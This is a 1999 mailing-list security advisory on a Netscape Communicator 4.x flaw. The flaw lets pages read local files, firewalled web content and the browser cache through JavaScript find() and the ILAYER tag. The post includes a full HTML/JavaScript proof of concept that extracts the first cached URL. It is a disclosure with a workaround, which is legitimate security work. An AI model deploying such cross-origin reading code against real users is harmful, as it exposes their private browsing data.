Netscape Communicator find() vulnerabilities

From: Georgi Guninski (guninskiat_private)
Date: Mon Mar 08 1999 - 09:48:05 PST

    There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I
    guess all 4.x version are vulnerable)
    which allows the following security exploits:

     *)Reading the parsed content of local HTML files (by 'parsed' I mean
    the text the user sees, not the actual HTML source)
     *)Reading the parsed content of HTML files on a web server blocked by a
    firewall (the browser and the web server must be on the same side of the
    firewall)
     *)Reading user's cache
     *)Browsing directories
     *)Probably others

    The exploits use the JavaScript find() function and the ILAYER tag.
    This may be exploited using HTML message.

    Workaround: Disable JavaScript

    Demonstration is available at:
     http://www.nat.bg/~joro/nsfind.html

    -----------HTML code-------------
    MBEGIN
    <ILAYER SRC="wysiwyg://1/about:cache">
    </ILAYER>

    <SCRIPT>
    //mag='MBEGIN';
    mag='Average cache';
    mend='MEND';
    res=mag;
    charstoread=100;

    function readit() {
    for(i=0;i<charstoread;i++) {
     t=res;
     find(mend);
     for(c=1;c<256;c++) {
       t=res + String.fromCharCode(c);

         if (find(t,true,true)) {
    //      alert(c);
          res=t;
         }
     }
    }
    res=res.substring(mag.length);
    alert("The first URL in your cache is: \n" + res);
    }
    setTimeout('readit();',3000);
    </SCRIPT>

    MEND